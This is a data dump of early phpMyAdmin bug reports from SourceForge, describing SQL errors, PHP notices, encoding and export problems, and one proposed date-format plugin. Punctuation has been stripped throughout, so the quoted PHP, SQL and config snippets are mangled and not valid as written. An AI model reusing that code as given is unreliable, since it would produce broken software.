Stefan Original URL https sourceforge.net p phpmyadmin bugs 1044 https sourceforge.net p phpmyadmin bugs 1044 Original author skuip Found in version Latest Git","bug"
"24444","7414","Attempt to get indexes for query that has none.
SQL query DESCRIBE tablename phpmyadmin result SQL query SHOW KEYS FROM MySQL said 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 mysql syntax http www.mysql.de doc en DESCRIBE.html Original URL https sourceforge.net p phpmyadmin bugs 1045 https sourceforge.net p phpmyadmin bugs 1045 Original author anonymous","bug"
"24444","7415","SQL window Edit .
when cfg[ ...iconic ] is set to both , Edit text in SQL windows is folowed non space SQL Query ...
Original URL https sourceforge.net p phpmyadmin bugs 1046 https sourceforge.net p phpmyadmin bugs 1046 Original author jenix","bug"
"24444","7416","SQL history error SQL Query.
In history in some case are stored error sql query ... steps select database not table then), click SQL in top of main window), type some error SQL query amp;amp; exec it, in main win is now error report, click on Back link amp;gt; auto refresh querywindow ..., in sql history is error SQL query ... PMA 2.5.5 dev 26.10), querywindow mode full Original URL https sourceforge.net p phpmyadmin bugs 1049 https sourceforge.net p phpmyadmin bugs 1049 Original author jenix Found in version Latest Git","bug"
"24444","7417","undef var sql order in display tbl.lib.php.
MySQL 4.0.12 max nt PHP Version 4.3.1 Win98SE Clicking to browse generates in PHP log PHP notice Undefined variable sql order in phpMyAdmin 2.5.4 libraries display tbl.lib.php on line 544 Peter Original URL https sourceforge.net p phpmyadmin bugs 1047 https sourceforge.net p phpmyadmin bugs 1047 Original author mandabaer Found in version 2.5.4","bug"
"24444","7418","serbian utf 8 files have wrong encodings.
In new version of phpMyAdmin 2.5.4) files serbian cyrillic utf 8.inc.php and serbian latin utf 8.inc.php are encoded in CP 1251 and CP 1250 respectively, instead in UTF 8, as they should be.
Original URL https sourceforge.net p phpmyadmin bugs 1050 https sourceforge.net p phpmyadmin bugs 1050 Original author branej Found in version 2.5.4","bug"
"24444","7419","Broken with privoxy.
Totally broken when used with privoxy, as privoxy tries inserting some html right after body tag.
VERY simple fix put amp;lt; script amp;gt; just before body tag in index.php3, remove the javascript from the following lines up to the amp;lt;noscript amp;gt;, not forgetting to remove the now extraneous amp;lt; script amp;gt; en route.
Phillip.
Original URL https sourceforge.net p phpmyadmin bugs 1048 https sourceforge.net p phpmyadmin bugs 1048 Original author ptemple Found in version Latest Git","bug"
"24444","7420","Bug in opening user rights.
I can t open the userrights section.
It worked in 2.5.3. i got the following browser destination res C \Windows\System32 \shdoclc.dll navcancl.htm http localhost phpMyAdmin 2.5.4 server privileges.php?lang=de iso 8859 1 amp;amp;server=1 I also found out, that if i ve more than one db configuration defined in config.ini, calling userrights crashed my ie it works for only one defined db config entry) Original URL https sourceforge.net p phpmyadmin bugs 1051 https sourceforge.net p phpmyadmin bugs 1051 Original author anonymous Found in version 2.5.4","bug"
"24444","7421","Table names converted to lower case on Windows.
In PMA 2.5.4 running with MySQL 4.0.14 max debug under IIS on Windows XP, entering a mixed case name in the create table form creates the table as lower case.
Repro 1\.
Make a new table called amp;quot;myTest amp;quot;, with one field.
2\.
Note the table list shows it as amp;quot;mytest amp;quot;.
When writing PHP code that accesses these tables, MySQL appears to be case insensitive about it, so accessing myTest or mytest will work fine.
The problem comes when exporting those over to a Linux Apache box.
The table names are all lower, and any code that refers to them in the wrong case will break.
Original URL https sourceforge.net p phpmyadmin bugs 1052 https sourceforge.net p phpmyadmin bugs 1052 Original author endquote Found in version 2.5.4","bug"
"24444","7422","left.php3 Missing hash.
phpMyAdmin 2.5.4 reports amp;quot;left.php Missing hash amp;quot; on the welcome page.
System configuration is Mac OS X 10.2.8, PHP Version 4.3.3 www.entropy.ch Release 2), mySQL 4.0.16 standard.
2.5.3 works fine with the same settings.
robert.geisler tuebingen.mpg.de Original URL https sourceforge.net p phpmyadmin bugs 1053 https sourceforge.net p phpmyadmin bugs 1053 Original author anonymous Found in version 2.5.4","bug"
"24444","7423","pb when field in where clause not included in select clause.
using the Run SQL query queries on database panel, i type a query where the field in the where clause is not included in the select clause.
i get correct results back, but when i click on the edit row icon in a result row, i dont get the correct line.
example in a database with names and surnames.
select name from db where surname like a yelds 4 lines.
i know these are the good names.
when i select a line for edit, i get back the first line in the index order with the displayed name, not the one with the correct name and surname.
IE with Name Surname smith john smith alicia smith bob if i do amp;quot;select name from db where surname like amp;quot;a amp;quot; i get amp;quot;smith amp;quot; as a result line, but when i click on the edit line icon, i get the record for john smith, instead of alicia smith.
levels in a linux Debian SID environment, with libmysqlclient12, mysql client,common and server at level 4.0.15a 1 phpmyadmin at level 2.5.3 1 PHP4 and php4 mysql at level 4.3.3 3 thanks in advance and best regards.
Eric.
Original URL https sourceforge.net p phpmyadmin bugs 1054 https sourceforge.net p phpmyadmin bugs 1054 Original author ericyriarte","bug"
"24444","7424","TimeOut when displaying all Tables.
when I will display all tables in a DB and I use Opera or Mozilla, then I got a error that the cgi !)
script can t be done.
But the IE has no problem.
But when I reduce the number of tables in the DB to under 500, then there was no problem.
This problem was only on my DB in the www 1und1.de), on my localhost there was no problem.
Original URL https sourceforge.net p phpmyadmin bugs 1055 https sourceforge.net p phpmyadmin bugs 1055 Original author anonymous","bug"
"24444","7425","text plain dateformat support more TIMESTAMPs.
text plain dateformat.inc.php supports DATETIME and TIMESTAMP 14) only.
Missing column types DATE, TIMESTAMP 12 10 8 6), INT Unix timestamp).
Possible new version follows I hope Garvin Hicking find this helpfull).
amp;lt;?php Id text plain dateformat.inc.php,v 1.1 2003 03 18 15 30 25 garvinhicking Exp vim expandtab sw=4 ts=4 sts=4 Plugin function TEMPLATE Garvin Hicking).
For instructions, read the libraries transformations README file.
The string ENTER FILENAME HERE shall be substituted with the filename without the .inc.php extension.
For further information regarding naming conventions see the README file.
if !defined PMA TRANSFORMATION TEXT PLAIN DATEFORMAT ))\{ define PMA TRANSFORMATION TEXT PLAIN DATEFORMAT , 1); function PMA transformation text plain dateformat buffer, options = array )) \{ possibly use a global transform and feed it with special options include .
libraries transformations global.inc.php ); further operations on buffer using the options[] array.
if !isset options[0]) || options[0] == ) \{ options[0] = 0; \} if !isset options[1]) || options[1] == ) \{ options[1] = GLOBALS[ datefmt ]; \} timestamp = 1; Detect DATE = YYYY MM DD and DATETIME = YYYY MM DD HH MM SS .
if strpos buffer, amp;quot; amp;quot;)) \{ timestamp = strtotime buffer); \} Detect TIMESTAMP 6 | 8 | 10 | 12 | 14), 2 | 4) not supported here.
elseif preg match \d\{2\})\{3,7\} , buffer)) \{ TIMESTAMP 8 | 14) = YYYYMMDD..., 6 | 10 | 12) = YYMMDD... if strlen buffer) == 14 || strlen buffer) == 8) offset = 4; else offset = 2; d = array ); d[ year ] = substr buffer, 0, offset); d[ month ] = substr buffer, offset, 2); d[ day ] = substr buffer, offset 2, 2); d[ hour ] = substr buffer, offset 4, 2); d[ minute ] = substr buffer, offset 6, 2); d[ second ] = substr buffer, offset 8, 2); if checkdate d[ month ], d[ day ], d[ year ])) \{ timestamp = mktime d[ hour ], d[ minute ], d[ second ], d[ month ], d[ day ], d[ year ]); \} \} If all above failed, maybe it s a Unix timestamp already?
if timestamp amp;lt; 0 amp;amp; amp;amp; preg match [1 9]\d\{1,9\} , buffer)) \{ timestamp = buffer; \} if timestamp != 1) \{ timestamp = options[0] 60 60; buffer = PMA localisedDate timestamp, options[1]); \} return buffer; \} \} ?
amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 1056 https sourceforge.net p phpmyadmin bugs 1056 Original author anonymous Found in version Latest Git","bug"
"24444","7426","Stringvalue NULL checks NULL box.
If I have row with a varcharfield which has the stringvalue NULL and I use pma to edit this row the varcharfield it contains the NULL as text context AND has the NULL checkbox checked.
This is wrong.
It should only show the NULL as content.
Original URL https sourceforge.net p phpmyadmin bugs 1057 https sourceforge.net p phpmyadmin bugs 1057 Original author sunnyboy75 Found in version 2.5.4","bug"
"24444","7427","XML export and characters as amp;quot;xc4x8d amp;quot;.
if I tried to export my database structure and data using xml, I ve got...
The XML page cannot be displayed Cannot view XML input using XSL style sheet.
Please correct the error and then click the Refresh button, or try again later.
An invalid character was found in text content.
Error processing resource http localhost phpMyAdmin 2.5.4 export.php .
Line 22, Position 58 amp;lt;description groupe usager amp;gt;Administrateur du syst The invalide caracter is an amp;quot;xc4x8d amp;quot;.
I m under win2000 5.00.2191 SP4 Apache 2.0.47 PHP 4.3.3 MySQL 4.0.13 nt phpMyAdmin 2.5.4 of course..
Regards Original URL https sourceforge.net p phpmyadmin bugs 1060 https sourceforge.net p phpmyadmin bugs 1060 Original author goulh Found in version 2.5.4","bug"
"24444","7428","MySQL Error message should be word wrapped.
When I put a query manually to PMA by amp;quot;SQL amp;quot;, and this query have an error, I got a error.
But this message is sometimes so long, that I have a horizontal scrollbar.
Original URL https sourceforge.net p phpmyadmin bugs 1058 https sourceforge.net p phpmyadmin bugs 1058 Original author anonymous Found in version Latest Git","bug"
"24444","7429","XML in Export and caracter as quot;xc4x8d quot;.
if I tried to export my database structure and data using xml, I ve got...
The XML page cannot be displayed Cannot view XML input using XSL style sheet.
Please correct the error and then click the Refresh button, or try again later.
An invalid character was found in text content.
Error processing resource http localhost phpMyAdmin 2.5.4 export.php .
Line 22, Position 58 amp;lt;description groupe usager amp;gt;Administrateur du syst The invalide caracter is an amp;quot;xc4x8d amp;quot;.
I m under win2000 5.00.2191 SP4 Apache 2.0.47 PHP 4.3.3 MySQL 4.0.13 nt phpMyAdmin 2.5.4 of course..
Regards Original URL https sourceforge.net p phpmyadmin bugs 1061 https sourceforge.net p phpmyadmin bugs 1061 Original author goulh Found in version 2.5.4","bug"
"24444","7430","2.5.4 portuguese) Insert Error.
I was using SQL textarea to insert data in one table.
My SQL statement had an error.
Instead of the usual Error Handling Page like amp;quot;You have an error in your SQL syntax near... amp;quot; I received the following error START Base de Dados abaco a correr em localhost Erro There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT eNrNVMtO4zAU3ecr7gKpIJmQZ9tkVqiqGKQCnZZhlshNbltXi Z2xnQrmb9Es0PwCq7luWjFIsJgd UizHvu9zTjKezW5mOYxCGEUwGV nkEUJrRTCOIi9 S0ZXzxv dDfP4eiyzMH8rBquDWq Egu WTds C6GfRRAFQXwWZGdhAOEgD M8yqDCOoPxQwNH3tXj Nskh 9iPYj8det nM7iZMzi GF fMrgbU50f QsLlGPp 4E2vznOI NRPvOnXqTOzG og8WM homQ7YM3O b yKGxp8Ko0 EwzU5Db1dCSOrO0mYV NFqVbWENHC80l W9KFnBrds0LlGjLJBJXiMr0RRaNFYoyUTN V8h4YcUWWaMF RSqwt35XshSbEXZ 8oqRV1O1xu2ttKLa3VDeE9jyqkUq2kt7rBfRioMsDtIkSjI6jJSR VlOVEoXmYP8UUhTUKz5zA0Yt NBqDFUqLhrwHw72lRDiEIDTVk7EU5b9J7m aFV2EtJKIhbEz0 nJd0CNPvnifGJxw0N BUzckG3QN LkWxpsFH6h243JjRwWOpHVoEyxa1UcChUAQinQtVw1JZtdJ 8Kbjx4ZrvnRl5vVqgVKAWGxrDRddU kGsKVwS65dUaoaQqHQ0SC LnSXfpVFfSZSuRqjXKiOffCrCG PqgWhrDkhlopOWjklfjFyerD6Kxy fBac7nczkNozNniIQihq w0m 3AaByxL9pwmHaePvU9Mahyn Qeoav91LfPMihdJ0MSU iU1FirZI UFbQYWcd4rBynaN51f1B7YShEcbuySaDVqZwPJAUalVipbrP xPG3Igo 0AV3xbhc85oY3qiV lgX h5D39fGfoihdNmmsbvcSSZxE p1EaIh uE93qHpMBNFxp K WZmVA 16 bM3uVWmanbpoa Jf8y2e OGG5EAdCvwshYcUsJVX9BQ7L nw= END CUT BEGIN RAW ERROR C1 C2 LEN 924 925 1303 STR xd1x8a CVS Id sqlparser.lib.php,v 1.92 2003 09 10 17 13 29 lem9 Exp MySQL 3.23.58 USR OS, AGENT, VER Win IE 6.0 PMA 2.5.4 PHP VER,OS 4.3.3 Linux LANG pt iso 8859 1 SQL insert into products brand id,cat id,reference,name,description,image,active ,price,colective individual,ageplus,ageuntill,ageref) values 5 , 2 , 3093054249 , Cosntrimadeira txd0xb9cnico pexd0xb7as sobresselentes , 78 pexd0xb7as de madeira e plxd0xb1stico.
, 3093054249.jpg , 1 , 42,13 , 3 , 5 , , n); insert into products brand id,cat id,reference,name,description,image,active ,price,colective individual,ageplus,ageuntill,ageref) values 5 , 2 , 3093054176 , Complemento fichas Contrimadeira txd0xb9cnico , 12 fichas frente e verso a cores e com fotografias.
Na frente, a fotografia do objecto a montar e o detalhe das pexd0xb7as necessxd0xb1rias.
No verso, a decomposixd0xb7xd0xb3o em 6 ou 8 fases da realizaxd0xb7xd0xb3o.
C l de cada ficha 29,7x21 cm.
, 3093054176.jpg , 1 , 30,94 , 3 , 4 , , y ); insert into products brand id,cat id,reference,name,description,image,active ,price,colective individual,ageplus,ageuntill,ageref) values 5 , 2 , 3093335051 , Txd0xb9cnico jxd1x8anior , Primeiro material composto de grandes pexd0xb7as de plxd0xb1stico resistente e de roscas.
12 modelos de montagem frente e verso a cores acompanham o jogo.
Na frente, a fotografia a cores do objecto a montar e as pexd0xb7as necessxd0xb1rias.
No verso, a decomposixd0xb7xd0xb3o da construxd0xb7xd0xb3o em 4 ou 6 fases.
161 pexd0xb7as a cores ripas com furos, parafusos, porcas e uma chave).
C ripa de 6 furos 23,5 cm END RAW Comando SQL insert into products brand id,cat id,reference,name,description,image,active ,price,colective individual,ageplus,ageuntill,ageref) values 5 , 2 , 3093054249 , Cosntrimadeira txd0xb9cnico pexd0xb7as sobresselentes , 78 pexd0xb7as de madeira e plxd0xb1stico.
, 3093054249.jpg , 1 , 42,13 , 3 , 5 , , n); insert into products brand id,cat id,reference,name,description,image,active ,price,colective individual,ageplus,ageuntill,ageref) values 5 , 2 , 3093054176 , Complemento fichas Contrimadeira txd0xb9cnico , 12 fichas frente e verso a cores e com fotografias.
Na frente, a fotografia do objecto a montar e o detalhe das pexd0xb7as necessxd0xb1rias.
No verso, a decomposixd0xb7xd0xb3o em 6 ou 8 fases da realizaxd0xb7xd0xb3o.
C l de cada ficha 29,7x21 cm.
, 3093054176.jpg , 1 , 30,94 , 3 , 4 , , y ); insert into products brand id,cat id,reference,name,description,image,active ,price,colective individual,ageplus,ageuntill,ageref) values 5 , 2 , 3093335051 , Txd0xb9cnico jxd1x8anior , Primeiro material composto de grandes pexd0xb7as de plxd0xb1stico resistente e de roscas.
12 modelos de montagem frente e verso a cores acompanham o jogo.
Na frente, a fotografia a cores do objecto a montar e as pexd0xb7as necessxd0xb1rias.
No verso, a decomposixd0xb7xd0xb3o da construxd0xb7xd0xb3o em 4 ou 6 fases.
161 pexd0xb7as a cores ripas com furos, parafusos, porcas e uma chave).
C ripa de 6 furos 23,5 cm Mensagens do MySQL 1064 You have an error in your SQL syntax near 5 , 2 , 3093054176 , Complemento fichas Contrimadeira txd0xb9cnico , 12 fichas frente at line 1 END Original URL https sourceforge.net p phpmyadmin bugs 1062 https sourceforge.net p phpmyadmin bugs 1062 Original author vercesi Found in version 2.5.4","bug"
"24444","7431","Field editing SQL error.
Having listed some records via browse, I click on the edit icon, and get this error SQL query SELECT display field FROM WHERE db name = mydb AND table name = mytable MySQL said You have an error in your SQL syntax near WHERE db name = mydb AND table name = mytable at line 1 You can see that the table name is missing from the SQL query that PMA generated.
I get about half the fields for the record displayed before the error appears the error seems to occur at the point where a value is about to be displayed it happens to be an indexed integer field).
Editing does work for other tables databases e.g.
PMA s own), so there s some nasty intermittent thing at work here.
Original URL https sourceforge.net p phpmyadmin bugs 1059 https sourceforge.net p phpmyadmin bugs 1059 Original author coolbru Found in version 2.5.4","bug"
"24444","7432","tbl row delete.php Missing sql query.
if u want to click on icon update data in table, i get this error.
In version 2.5.3 this error not appear.
I can export this row to sql file and send it.
Original URL https sourceforge.net p phpmyadmin bugs 1063 https sourceforge.net p phpmyadmin bugs 1063 Original author john w Found in version Latest Git","bug"
"24444","7433","generator assumes php3.
Release version of phpMyAdmin.
File is phpMyAdmin libraries transformations generate.sh If you look at it, you ll notice two of references to .php3.
Therefore it will generate a file with these extensions.
Unfortunately, this extension is incorrect because phpMyAdmin library transformations.inc.php checks for a file without the amp;quot;php3 amp;quot;.
Whoops!
Take care, terry Original URL https sourceforge.net p phpmyadmin bugs 1064 https sourceforge.net p phpmyadmin bugs 1064 Original author tychay Found in version Latest Git","bug"
"24444","7434","function error reset ) ).
Warning Variable passed to reset ) is not an array or object in home www mysqla html libraries display tbl.lib.php on line 1384 This error appears wehn you choose the print view of an analyzed table german version) Original URL https sourceforge.net p phpmyadmin bugs 1065 https sourceforge.net p phpmyadmin bugs 1065 Original author cwoffice Found in version 2.5.4","bug"
"24444","7435","fulltext and field types.
apache 1.3.26 php 4.3.2 mysql 3.23.53 max nt d jezebel yahoo.com On tbl properties structure.php the Fulltext imagelink is disabled for some field types that do support fulltext indices.
For example mediumtext.
The mysql manual says that only char, varchar and text fields can be used for FT searching.
I was fooled into thinking that texttypes != text do not support FT.
I guess you guys were too.
Original URL https sourceforge.net p phpmyadmin bugs 1067 https sourceforge.net p phpmyadmin bugs 1067 Original author anonymous Found in version 2.5.4","bug"
"24444","7436","Header of cols is moved.
Header with names of cols is in 2nd and next moved by one to left.
Original URL https sourceforge.net p phpmyadmin bugs 1066 https sourceforge.net p phpmyadmin bugs 1066 Original author anonymous Found in version 2.5.4","bug"
"24444","7437","no result.
I ve a problem the query SELECT stwc2bsp ips.id FROM stwc2bsp ips, stwc2bsp letzten100 WHERE stwc2bsp letzten100.userdaten = Mozilla 4.0 compatible; MSIE 6.0; X11; Linux i686) Opera 7.22 [de] AND stwc2bsp ips.ip LIKE 127.0.
AND stwc2bsp ips.id = stwc2bsp letzten100.id table1 CREATE TABLE `stwc2bsp ips` `zeit` int 10) NOT NULL default 0 , `startzeit` int 10) NOT NULL default 0 , `seitenaufrufe` int 10) NOT NULL default 0 , `pfad` text NOT NULL, `ip` varchar 15) NOT NULL default , `id` int 100) NOT NULL default 0 , `sperre` char 1) NOT NULL default 0 ) TYPE=MyISAM; INSERT INTO `stwc2bsp ips` VALUES 1068886629, 1068886629, 0, , 127.0.0.2 , 9999, 0 ); table2 CREATE TABLE `stwc2bsp letzten100` `id` int 100) NOT NULL default 0 , `ip` varchar 15) NOT NULL default , `timestamp` varchar 10) NOT NULL default , `aufloesung` varchar 9) NOT NULL default , `farbtiefe` char 3) NOT NULL default 0 , `userdaten` text NOT NULL, `referer` text NOT NULL, `seitenaufrufe` int 10) NOT NULL default 0 , `verweildauer` int 10) NOT NULL default 0 , `pfad` text NOT NULL, PRIMARY KEY `id`) ) TYPE=MyISAM; INSERT INTO `stwc2bsp letzten100` VALUES 9999, 127.0.0.1 , , ??
?
, ???
, Mozilla 4.0 compatible; MSIE 6.0; X11; Linux i686) Opera 7.
22 [de] , , 0, 0, ); the result has to be 9999 PMA find nothing !
Original URL https sourceforge.net p phpmyadmin bugs 1068 https sourceforge.net p phpmyadmin bugs 1068 Original author anonymous","bug"
"24444","7438","Exporting to SQL Backquoting.
The option Enclose table and field names with backquotes Does not backquote field names in the Create Table SQL statement, but does backquote the tablename.
This means fields with spaces in the names cause the SQL to error when importing.
xc5x94xc5x84txc5x91nxcbx99 Bxc5x91xc3xb6th xc5x94xc5x84txc5x91nxcbx99 \{dxc5x88t\} bxc5x91xc3xb6th \{xc4xb9T\} virgixc5x84 \{Dxc5x99t\} xc5x84xc3xabt Original URL https sourceforge.net p phpmyadmin bugs 1069 https sourceforge.net p phpmyadmin bugs 1069 Original author anonymous","bug"
"24444","7439","Field xc2xb4tablexc2xb4 in pma history on mysql lt; 3.23.6.
Backquoting of field and table names is only supported from mysql 3.23.6 onwards.
A reserved name cannot be used as a field name without backquoting.
So the pma history does not work on mysql amp;lt; 3.23.6, because it uses a field called table .
Original URL https sourceforge.net p phpmyadmin bugs 1070 https sourceforge.net p phpmyadmin bugs 1070 Original author baschny Found in version 2.5.4","bug"
"24444","7440","SHOW FULL) PROCESSLIST on a sql query.
If you open a query window and type SHOW PROCESSLIST or SHOW FULL PROCESS LIST it shows a useless checkbox on every row.
This makes the column titles not match the columns.
Also, I get amp;quot;Notice Undefined variable del query in C \Inetpub\phpMyAdmin\libraries\display tbl links.lib.php on line 7 amp;quot; just before the checkbox.
bichinhoverde spwinternet.com.br Original URL https sourceforge.net p phpmyadmin bugs 1071 https sourceforge.net p phpmyadmin bugs 1071 Original author anonymous","bug"
"24444","7441","is not escaped in sql dump.
Mysql uses as a comment start.
Text fields with in them need to be escaped when exporting tables via sql.
Mysql will crash when it encounters an unescaped in an INSERT statement generated by a SQL dump of the data.
gschoenu torbeckind.com Original URL https sourceforge.net p phpmyadmin bugs 1072 https sourceforge.net p phpmyadmin bugs 1072 Original author anonymous","bug"
"24444","7442","Wrong left frame from server databases overview.
hy sry 4 my eng.
but i have found a bug in.... my situation is...i have run a mysql4.0.16 standard and apache1.3.29 server on debian linux woody bf2.4.18).
On my w2k i have run a mysql3.23.57 nt server so when i use phpmyadmin, and go on amp;quot;Database amp;quot; on win mysql ) and klick then on amp;quot;Check Rights amp;quot; of even database the left frame will change to linux mysql and the right frame remains on win mysql.... in phpmyadmin config is linux at first and then win server entering.
for better understanding i have attached a jpg file.... ps if i go back it will not change back....so i must restart phpmyadmin or select mysql4 and then again mysql3 ) but that can t it be ;) cya Jointy Original URL https sourceforge.net p phpmyadmin bugs 1073 https sourceforge.net p phpmyadmin bugs 1073 Original author anonymous Found in version 2.5.4","bug"
"24444","7443","Delete no record.
If I click in the table view on the delete button and i havn t marked a row for delete, phpMyAdmin returns with a error Notice Undefined variable original sql query in home xxx server webserver phpadmin tbl row delete.php on line 49 Notice Undefined variable original url query in home xxx server webserver phpadmin tbl row delete.php on line 50 Notice Undefined variable original pos in home xxx server webserver phpadmin tbl row delete.php on line 51 tbl row delete.php Missing sql query Original URL https sourceforge.net p phpmyadmin bugs 1074 https sourceforge.net p phpmyadmin bugs 1074 Original author anonymous Found in version 2.5.4","bug"
"24444","7444","search for quoted text causes error.
PhpMyAdmin 2.5.4 MySQL 3.23.43 On the search page, I search my table like this first name LIKE O brien This is the error message I get There seems to be an error in your SQL query.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem ERROR Unclosed quote 68 STR SQL SELECT FROM `waka paddler` WHERE 1 AND `first name` LIKE O brien SQL query SELECT FROM `waka paddler` WHERE 1 AND `first name` LIKE O brien MySQL said 1064 You have an error in your SQL syntax near brien at line 1 Original URL https sourceforge.net p phpmyadmin bugs 1075 https sourceforge.net p phpmyadmin bugs 1075 Original author bumperbox Found in version 2.5.4","bug"
"24444","7445","Proposed DB names are backquoted.
Hi there, If I log in as a user with CREATE privilege on certain databases, phpMyAdmin adds backquotes to the proposed database name on the welcome page.
This is annoying since not removing the backquotes results in a MySQL error.
I m not sure, if this is already fixed in 2.5.5 dev, but I will test it soon if no one else does).
Alexander Original URL https sourceforge.net p phpmyadmin bugs 1076 https sourceforge.net p phpmyadmin bugs 1076 Original author rabus Found in version 2.5.4","bug"
"24444","7446","Moving foreign keys doesn t work on Windows.
The order of db tables in a database export should be done with respect to foreign keys.
Otherwise it requires lot of manual reordering when reimporting tables back to InnoDB.
Example CREATE TABLE MyUser user id INTEGER NOT NULL AUTO INCREMENT PRIMARY KEY ) TYPE=InnoDB; create table ReferencesUser user rid INTEGER NOT NULL, INDEX user idx user rid), FOREIGN KEY user rid) REFERENCES MyUser user id) ON DELETE CASCADE ) TYPE=InnoDB; The order of these two tables should always be 1.
MyUser, 2.
ReferencesUser which is not guaranteed with phpMyAdmin 2.5.4).
PS This requirement also applies to all INSERT statements, of couse.
Original URL https sourceforge.net p phpmyadmin bugs 1077 https sourceforge.net p phpmyadmin bugs 1077 Original author ptoman Found in version Latest Git","bug"
"24444","7447","2.5.4) Can t create tables.
After logging in and selecting my database amp;quot;test amp;quot;) in this case.
I try to create a table amp;quot;mytable amp;quot;) e.g.
Create new table on database test Name mytable Fields 3 [Go] phpMyAdmin then gives me this output, as if its trying to create the table already ?)
Database test Table mytable running on localhost Error SQL query CREATE TABLE `mytable` ) MySQL said 1113 A table must have at least 1 column [Documentation] Error SQL query CREATE TABLE `mytable` ) MySQL said The field count is empty!
Original URL https sourceforge.net p phpmyadmin bugs 1079 https sourceforge.net p phpmyadmin bugs 1079 Original author dsd","bug"
"24444","7448","Some undefined things in current cvs.
When I browse any table with current cvs I get something like Notice Undefined variable gotXo in mnt data www pma libraries display tbl.lib.php on line 619 Notice Undefined offset 0 in mnt data www pma libraries display tbl.lib.php on line 754 Notice Undefined offset 0 in mnt data www pma libraries display tbl.lib.php on line 755 Notice Undefined offset 1 in mnt data www pma libraries display tbl.lib.php on line 754 Notice Undefined offset 1 in mnt data www pma libraries display tbl.lib.php on line 755 Original URL https sourceforge.net p phpmyadmin bugs 1080 https sourceforge.net p phpmyadmin bugs 1080 Original author nijel Found in version Latest Git","bug"
"24444","7449","FORCE INDEX not recognized.
phpMyAdmin 2.5.2, MySQL 4.0.16, PHP 4.3.4 USE INDEX key list) is recognized, but when using FORCE INDEX key list), the FORCE keyword is glued to the table name, resulting in a MySQL syntax error!
Original URL https sourceforge.net p phpmyadmin bugs 1081 https sourceforge.net p phpmyadmin bugs 1081 Original author jigal Found in version 2.5.4","bug"
"24444","7450","Undefined var url query in display tbl.lib.php.
Hy, while i was browsing my tables in phpmyadmin v2.5.4 ... i saw that you have a Notice Message when you under table operations klick on amp;quot;Optimize Table amp;quot; the msg is every time the same... Notice Undefined variable url query in home www phpmyadmin libraries display tbl.lib.php on line 1477 cya Jointy amp;lt;bestmischmaker web.de amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 1078 https sourceforge.net p phpmyadmin bugs 1078 Original author anonymous","bug"
"24444","7451","Substr transformation broken with utf 8. text plain substr transformation gets text and return it s substring.
Problem is that the text is unicode when using utf 8 translation so the text might be truncated in the middle of one utf 8 character.
Original URL https sourceforge.net p phpmyadmin bugs 1082 https sourceforge.net p phpmyadmin bugs 1082 Original author nijel Found in version Latest Git","bug"
"24444","7452","2.5.4) No CSS with safe mode On.
When safe mode view php.ini for referance) is On the CSS doesn t get loaded correctly.
No other problems found other then a visual one, just looks ugly ) Original URL https sourceforge.net p phpmyadmin bugs 1083 https sourceforge.net p phpmyadmin bugs 1083 Original author anonymous Found in version 2.5.4","bug"
"24444","7453","Parse error parse error, unexpected end.
Parse error parse error, unexpected end in d \www\htdocs\phpmyadmin\db details structure.php on line 695 Original URL https sourceforge.net p phpmyadmin bugs 1085 https sourceforge.net p phpmyadmin bugs 1085 Original author anonymous","bug"
"24444","7454","Insert form doesn t display standard values.
Insertform in phpMyAdmin 2.5.5 rc1 with MySQL 3.23.58 doesn t display standard values on the insertform.
Original URL https sourceforge.net p phpmyadmin bugs 1086 https sourceforge.net p phpmyadmin bugs 1086 Original author jgweijer Found in version Latest Git","bug"
"24444","7455","data dictionary and ENUM.
Andrew Weiner reported a problem about a warning in db datadict.php.
ENUMs and SETs values are not listed in the data dictionary.
I confirm and will implement his proposed fix.
Original URL https sourceforge.net p phpmyadmin bugs 1087 https sourceforge.net p phpmyadmin bugs 1087 Original author lem9","bug"
"24444","7456","parse error in left.php 734) eval ) d. phpMyAdmin 2.5.5 dev Release date Thu Dec 4 21 29 16 UTC 2003 PHP 4.2.3 on Linux, Apache 1.3.29 2 database servers, each with one database config of server 1 i = 1) cfg[ Servers ][ i][ host ] = server1.de ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ compress ] = FALSE; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = user1 ; cfg[ Servers ][ i][ password ] = password1 ; cfg[ Servers ][ i][ only db ] = database1 ; config of server 2 i = 2) cfg[ Servers ][ i][ host ] = server2.de ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ compress ] = FALSE; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = user2 ; cfg[ Servers ][ i][ password ] = password2 ; cfg[ Servers ][ i][ only db ] = database2 ; Default set to server 1 i = 1) Error encountered Selecting server 1 Everything is ok Selecting server 2 In Left frame expanding database by click to [ ], I see 2 times) the error message Parse error parse error in xx phpMyAdmin left.php 734) eval ) d code on line 1 Parse error parse error in xx phpMyAdmin left.php 734) eval ) d code on line 1 Greetings Peter Original URL https sourceforge.net p phpmyadmin bugs 1084 https sourceforge.net p phpmyadmin bugs 1084 Original author mandabaer Found in version Latest Git","bug"
"24444","7457","Short open tags in db details structure.php.
When short tags are off there is a parse error in db display structure.php.
The error is at line 483.
It needs to be changed to read amp;lt;?php \} ?
amp;gt; Sorry if this is a duplicate report, but I couldn t find anything similar.
Michael Original URL https sourceforge.net p phpmyadmin bugs 1088 https sourceforge.net p phpmyadmin bugs 1088 Original author redbeardc Found in version Latest Git","bug"
"24444","7458","Multi rows editing leads to undefined variables.
